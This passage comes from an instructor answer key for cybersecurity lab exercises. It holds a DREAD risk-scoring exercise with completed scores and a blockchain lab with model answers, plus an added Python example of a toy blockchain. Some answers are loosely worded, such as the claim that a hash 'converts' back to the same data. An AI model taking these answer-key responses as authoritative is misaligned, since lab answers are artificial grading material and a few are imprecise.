equipment. While searching the Internet for vulnerabilities affecting one of their IoT devices, Jose found a
report of a firmware vulnerability. The details of how to exploit this threat were clearly documented, and it
appears that the exploit could cause the loss of individual user data. The exploit requires a couple of
commands from any authorized user who connects to this device. It appears that any web browser could be
used to launch the attack, but if exploited it wouldn’t affect any users directly.
Indicate your score for each of the DREAD categories:
Damage Potential: _______________________________________________________________________
Reproducibility: _______________________________________________________________________
Exploitability: _______________________________________________________________________
Affected Users: _______________________________________________________________________
Discoverability: _______________________________________________________________________
Damage Potential = 5, Reproducibility = 5, Exploitability = 10, Affected Users = 0, Discoverability = 9
What is the DREAD score for the vulnerability described above?
_______________________________________________________________________________________
DREAD Score: 5.8

Part 3: Reflecting on the Use of the DREAD Scoring System


How should an organization handle a threat with this score?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Considering the range is 0 to 10, a score of 5.8 is important to handle, but threats closer to 10 are more
serious and should be dealt with first.
How could this scoring system be improved?
_______________________________________________________________________________________
_______________________________________________________________________________________


Weighting could be implemented for each category. Numbers between 0 and 5 or 5 and 10 could be used for
each category to make it more granular.
What are some of the features or advantages of the DREAD system?
_______________________________________________________________________________________
_______________________________________________________________________________________
DREAD is very simple to use and understand. DREAD can be easily used to compare and prioritize risks in
order to determine which ones to handle first.

Lab – Blockchain Demo 2.0 (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Complete the Blockchain Demo 2.0
Complete Reflection Questions

Background / Scenario
Blockchain is the technology behind the cryptocurrency bitcoin. It uses a distributed database to
cryptographically secure transactions. Blockchain transactions are immutable.
In this lab, you will complete the Blockchain Demo 2.0 created by freeCodeCamp and answer some questions
about this technological innovation.
Instructor Note: Students should still be able to complete this lab if the website link is broken or no longer
available.

Required Resources
• A computer with Internet access

Complete the Blockchain Demo 2.0


Go to either of the following websites to learn more about blockchain:
• Blockchain Demo 2.0
• freeCodeCamp Tutorial
Alternatively, you can answer the reflection questions by researching them on your own.

Reflection
1. What is the name of the first block created in a blockchain and what is its index value?
_______________________________________________________________________________________
_______________________________________________________________________________________
The first block is called the genesis block and its index value is 0.
2. List the six pieces of information stored in a block.
_______________________________________________________________________________________
_______________________________________________________________________________________
Each block includes the following information: index, timestamp, hash, previous hash, data, and nonce.
3. What is the purpose of the timestamp?
_______________________________________________________________________________________
_______________________________________________________________________________________
The timestamp is used to order the blockchain transactions.


4. Describe the properties of the hash used in a blockchain.
_______________________________________________________________________________________
_______________________________________________________________________________________
Hash values have a fixed number of hexadecimal digits. The same hash will always convert to the same
data. The hash is easy to compute but infeasible for a threat actor to convert to data. A small change in the
data results in a big change in the hash.
5. Assume that f = hash function. Write the formula used to calculate the hash for the following block:
index = 5
previous hash = 000dc75a315c7...
timestamp = 1529514000
data = $1000.00
nonce = 714
_______________________________________________________________________________________
_______________________________________________________________________________________
f(5 + 000dc75a315c7 + 1529514000 + “$1000.00” + 714) = new hash
6. What is the purpose of the nonce?
_______________________________________________________________________________________
_______________________________________________________________________________________
The nonce is the number used to calculate a valid hash. This is the part of the hash function that consumes
the most processing power.
7. What are the four requirements a new block must meet in order to be valid?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
The four requirements for a valid block are as follows:
• The index value must be one greater than last block’s index.
• The previous hash value must be equal to last block’s hash.
• The block must meet the difficulty requirement.
• The block’s hash must be calculated correctly.
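Questions 5 and 7 can be worked through in code. The following Python is an added example, not part of the Cisco lab or the freeCodeCamp demo; it assumes SHA-256 as the hash function f, concatenation of the five fields in the order given in question 5, and a difficulty expressed as the number of leading zeros the hash must have (a constructed value of 2 here).

```python
"""Added example: a minimal blockchain that hashes blocks as in question 5 and
checks new blocks against the four validity rules in question 7.
Not the lab's or freeCodeCamp's code; hash function and difficulty are assumed."""
import hashlib

DIFFICULTY = 2  # constructed for this example: a valid hash starts with "00"


def compute_hash(index, previous_hash, timestamp, data, nonce):
    """f(index + previous hash + timestamp + data + nonce), with f = SHA-256."""
    payload = "%s%s%s%s%s" % (index, previous_hash, timestamp, data, nonce)
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()


def mine_block(index, previous_hash, timestamp, data, difficulty=DIFFICULTY):
    """Try nonces from 0 upward until the hash meets the difficulty target.
    This search is the work that consumes processing power (question 6)."""
    nonce = 0
    while True:
        h = compute_hash(index, previous_hash, timestamp, data, nonce)
        if h.startswith("0" * difficulty):
            return {"index": index, "previous_hash": previous_hash,
                    "timestamp": timestamp, "data": data, "nonce": nonce, "hash": h}
        nonce += 1


def genesis_block(timestamp=1529514000):
    """The first block: index 0, with no real previous hash (constructed "0")."""
    return mine_block(0, "0", timestamp, "Genesis block")


def is_valid_new_block(new, prev, difficulty=DIFFICULTY):
    """The four rules from question 7, checked in order."""
    if new["index"] != prev["index"] + 1:            # index one greater than last
        return False
    if new["previous_hash"] != prev["hash"]:         # links to the last block's hash
        return False
    if not new["hash"].startswith("0" * difficulty):  # meets the difficulty requirement
        return False
    recomputed = compute_hash(new["index"], new["previous_hash"],
                              new["timestamp"], new["data"], new["nonce"])
    return new["hash"] == recomputed                 # hash calculated correctly


def is_valid_chain(chain, difficulty=DIFFICULTY):
    """Validate the genesis block's hash, then every link in the chain."""
    g = chain[0]
    if g["index"] != 0 or g["hash"] != compute_hash(
            0, g["previous_hash"], g["timestamp"], g["data"], g["nonce"]):
        return False
    return all(is_valid_new_block(chain[i], chain[i - 1], difficulty)
               for i in range(1, len(chain)))


def build_demo_chain():
    """Constructed sample chain: genesis plus three transaction blocks."""
    chain = [genesis_block()]
    for i, amount in enumerate(["$1000.00", "$250.00", "$42.00"], start=1):
        prev = chain[-1]
        chain.append(mine_block(i, prev["hash"], prev["timestamp"] + 60 * i, amount))
    return chain


def tamper(chain, index, new_data):
    """Copy the chain and alter one block's data without re-mining it."""
    copy = [dict(b) for b in chain]
    copy[index]["data"] = new_data
    return copy


if __name__ == "__main__":
    chain = build_demo_chain()
    print("valid chain:", is_valid_chain(chain))
    print("after tampering with block 1:", is_valid_chain(tamper(chain, 1, "$9000.00")))
```

Changing the data in block 1 leaves the recorded hash unchanged, so rule four fails on recomputation; re-mining block 1 would then break rule two for every later block, which is why early blocks become harder to alter (question 11).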
8. What type of global network does blockchain use?
_______________________________________________________________________________________
_______________________________________________________________________________________
Blockchain uses a peer-to-peer network.
9. How does a peer determine who has the most up-to-date blockchain?
_______________________________________________________________________________________
_______________________________________________________________________________________
The peer with the longest valid chain of blocks takes precedence over all other peers.


10. How does a peer make sure all other peers have the latest and longest blockchain?
_______________________________________________________________________________________
_______________________________________________________________________________________
The peer broadcasts its latest blocks to all its peers. The timestamp determines who has the latest block.
11. Why is blockchain considered immutable?
_______________________________________________________________________________________
_______________________________________________________________________________________
As more blocks are added to the blockchain, early blocks become harder to hack. The hacker would have to
mine faster than the rest of the network, which would take massive processing power. In addition, the hacker
would have to own 51% or more of the peers.
